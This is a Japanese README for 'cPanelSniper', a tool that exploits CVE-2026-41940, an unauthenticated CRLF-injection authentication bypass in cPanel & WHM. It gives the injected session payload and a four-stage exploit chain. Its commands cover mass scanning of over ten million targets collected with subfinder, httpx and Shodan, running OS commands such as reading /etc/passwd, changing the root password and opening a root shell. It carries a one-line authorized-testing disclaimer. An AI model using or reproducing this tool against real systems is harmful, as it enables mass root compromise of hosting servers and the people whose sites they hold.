
cPanelSniper STABLE - CVE-2026-41940、1000万以上のターゲット向けに最適化
CVE-2026-41940 — セッションファイルCRLFインジェクションによるcPanel & WHM認証バイパス
4段階エクスプロイトチェーン · 対話型WHMシェル · 1000万以上のターゲットでTRUE STABLE · メモリ使用量ゼロ · stdlibのみ
cPanelSniper は、cPanel & WHM に影響を与える重大な認証バイパス脆弱性である CVE-2026-41940 に特化したエクスプロイトフレームワークです。この脆弱性により、認証されていないリモート攻撃者が、有効な認証情報なしで Authorization HTTPヘッダーを介してセッションファイルにCRLFシーケンスを注入し、rootレベルのWHMアクセスを獲得できます。
許可されたペネトレーションテストおよびバグバウンティプログラム専用です。
このバージョンは、メモリ使用量ゼロで10,000,000以上のターゲットをスキャンするように最適化されています。
| 問題 | オリジナルバージョン | 修正バージョン |
|---|---|---|
| メモリ使用量 | すべてのターゲットをRAMに読み込む | ターゲットを1行ずつストリーミング (メモリ0) |
| 1000万ターゲット | OOM → 強制終了 ❌ | 正常に完了 ✅ |
| 再開 | 非対応 | --resume フラグ |
| 進捗状況 | ETAなし | リアルタイムETA + レート + 統計 |
| 結果 | 最後にのみ保存 | 60秒ごとに保存 (設定可能) |
--resume で中断した場所から続行subfinder、httpx、shodan とシームレスに連携根本原因は Session.pm にあります。saveSession() 関数は、セッションファイルをディスクに書き込んだ 後 に filter_sessiondata() を呼び出します。つまり、Authorization: Basic ヘッダー値に埋め込まれたCRLF文字がそのままセッションファイルに書き込まれ、サニタイズ前に攻撃者が制御するフィールドが注入されます。
通常のフロー:
POST /login/ → filter_sessiondata() → セッション書き込み → 認証チェック
脆弱なフロー:
POST /login/ → セッション書き込み (CRLFペイロード注入) → filter_sessiondata() → 認証チェックが汚染されたファイルを読み取る
Authorization: Basic の値は次のようにデコードされます:
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
これらのフィールドはディスク上のセッションファイルに直接書き込まれます。読み戻されると、cPanel はこのセッションを完全に認証されたrootセッションとして扱います。
┌─────────────────────────────────────────────────────────────┐
│ ステージ 0 — 正規ホスト名の検出 │
│ GET /openid_connect/cpanelid → 307 → 実際のホスト名 │
├─────────────────────────────────────────────────────────────┤
│ ステージ 1 — 事前認証セッションの生成 │
│ POST /login/?login_only=1 (誤った認証情報) │
│ ← 401 + whostmgrsession クッキー │
├─────────────────────────────────────────────────────────────┤
│ ステージ 2 — CRLFインジェクション │
│ GET / + Cookie: session + Authorization: Basic <payload> │
│ cpsrvd がCRLFフィールドをセッションファイルに書き込む │
│ ← 307 Location: /cpsessXXXXXXXXXX/... │
├─────────────────────────────────────────────────────────────┤
│ ステージ 3 — 伝播 (do_token_denied ガジェット) │
│ GET /scripts2/listaccts │
│ raw→cache フラッシュをトリガー — 注入フィールドが有効化 │
│ ← 401 Token denied (想定内) │
├─────────────────────────────────────────────────────────────┤
│ ステージ 4 — WHM rootアクセスの検証 │
│ GET /cpsessXXXXXXXXXX/json-api/version │
│ ← 200 {"version":"11.x.x.x","result":1} = PWNED │
└─────────────────────────────────────────────────────────────┘
| ブランチ | 脆弱なバージョン | 修正済みバージョン |
|---|---|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help
pipインストールは不要です。純粋なPython 3.8+ stdlibのみです。
# 単一ターゲット — スキャンのみ
python3 cPanelSniper.py -u https://target.com:2087
# 単一ターゲット — バイパス後の対話型シェル
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# 大規模ターゲットリスト — 1000万以上のターゲット (TRUE STABLE)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# 中断されたスキャンの再開
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
# サーバー上のすべてのcPanelアカウントを一覧表示
python3 cPanelSniper.py -u https://target.com:2087 --action list
# OSコマンドを実行
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"
# サーバー情報を取得 (ホスト名、負荷、ディスク、MySQLホスト)
python3 cPanelSniper.py -u https://target.com:2087 --action info
# cPanelバージョンを取得
python3 cPanelSniper.py -u https://target.com:2087 --action version
# rootパスワードを変更
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'
# 対話型WHMシェル
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# subfinder → httpx → ファイルに保存 → 1000万以上のターゲットをスキャン
subfinder -d target.com -silent | \
httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# スコープリストから - 数百万のドメインを処理
cat scope.txt | \
httpx -silent -ports 2087,2086 -threads 100 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
# Shodan結果 - 大規模スキャン
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' > targets.txt
python3 cPanelSniper.py -l targets.txt -t 30 -o shodan_results.json
# stdinパイプ - 小規模リストのみ (<100K)
echo "https://target.com:2087" | python3 cPanelSniper.py
# 複数ソースの組み合わせ → 大規模スキャン
{ subfinder -d target.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 > all_targets.txt
python3 cPanelSniper.py -l all_targets.txt -t 50 -o results.json --resume
1000万以上のターゲット をスキャンする場合:
まずファイルに保存する - 大規模リストでは直接パイプしない
# 良い例 - 1000万以上のターゲットで動作
httpx ... > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# 悪い例 - 大規模リストではクラッシュする
httpx ... | python3 cPanelSniper.py
適切なスレッド数を使用
長時間スキャンでは自動再開を有効にする
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
中断された場合は、--resume を付けて再度実行するだけです
進捗状況を監視
バイパス成功後、--action shell フラグで対話型プロンプトに入ります:
════════════════════════════════════════════════════════════
WHM Shell — target.com
Version: CVE-2026-41940 | Auth: CRLF bypass
Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════
[email protected] ▶ id
uid=0(root) gid=0(root) groups=0(root)